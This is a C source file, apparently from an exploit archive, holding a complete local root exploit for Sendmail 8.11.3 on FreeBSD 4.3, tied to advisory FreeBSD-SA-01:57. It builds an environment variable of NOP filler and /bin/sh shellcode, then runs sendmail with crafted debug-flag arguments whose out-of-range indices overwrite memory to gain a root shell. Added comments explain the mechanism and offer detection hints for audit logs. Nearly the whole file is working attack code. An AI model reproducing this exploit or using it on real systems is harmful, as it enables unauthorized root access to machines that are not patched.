Sendmaild.c is a local root exploit for Sendmail on BSD. It exploits the bug discussed in FreeBSD-SA-01:57 and was tested on FreeBSD 4.3-RELEASE with Sendmail 8.11.3.
af378464c45ce674f69dcef1b241d4a304679c343fa1f55700fd04fe7f29c324
/*
* local r00t exploit for sendmail on *bsd*
*
* tested on: FreeBSD 4.3-RELEASE (sendmail version 8.11.3)
*
* written by CrZ [crazy_einstein@yahoo.com] LimpidByte
*
* credits by Cade Cairnss: https://packetstormsecurity.org/advisories/freebsd/FreeBSD-SA-01:57.sendmail
*/
#include <sys/param.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#define NOPNUM 1024
char shellcode[] =
"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89"
"\x4e\x08\x89\x46\x0c\x8d\x4e\x08"
"\x50\x51\x56\x50\xb0\x3b\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
/*
 * Proof-of-concept driver for the issue referenced in the file header
 * (FreeBSD-SA-01:57). It reads no input: argc and argv are unused. It
 * builds one environment string and one command-line argument, then
 * replaces the current process with /usr/sbin/sendmail via execve().
 *
 * Returns 0 only if execve() returns, i.e. if the exec failed; that failure
 * is not reported. Exits with -1 if the allocation fails.
 *
 * Defender notes, limited to what this listing shows:
 *  - The sendmail process is started with exactly one argument made of four
 *    newline-separated "-d" debug-flag settings whose indices are ten-digit
 *    decimal numbers, and with an environment holding a single variable,
 *    EGG, of more than 1 KiB. Either trait is unusual for a legitimate
 *    sendmail invocation and can be matched in exec/audit logs.
 *  - The advisory named in the file header is the authoritative source for
 *    affected versions, fixed versions and workarounds.
 */
int main(int argc, char *argv[])
{
char *egg, s[256], *av[3], *ev[2];
/* Size: "EGG=" (4) + NOPNUM filler + payload + terminating NUL (1). */
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
/* Lay out the environment entry: name, then filler, then payload. */
sprintf(egg, "EGG=");
/* Overwrites the NUL left by the previous sprintf with NOPNUM bytes of 0x90. */
memset(egg + 4, 0x90, NOPNUM);
/* Appends the payload and the final NUL directly after the filler. */
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
/*
 * Fixed argument string of 111 characters, so it fits s[256]. Every index
 * (4294900452..4294900455) is larger than 2^31 - 1 and therefore cannot be
 * represented as a positive 32-bit signed int.
 * NOTE(review): the advisory is understood to attribute the bug to signed
 * handling of debug-flag arguments; confirm against the advisory text.
 * Presumably each ".N" suffix is the level assigned to that index, so four
 * consecutive indices each receive one value in 0..255.
 */
sprintf(s,"-d4294900452-4294900452.196\n-d4294900453-4294900453.252\n-d4294900454-4294900454.191\n-d4294900455-4294900455.191");
/* argv for the new process: program path plus the single -d argument. */
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
/* The environment is replaced wholesale: EGG is its only entry. */
ev[0] = egg;
ev[1] = NULL;
/* Does not return on success; egg is never freed because of that. */
execve(*av, av, ev);
return 0;
}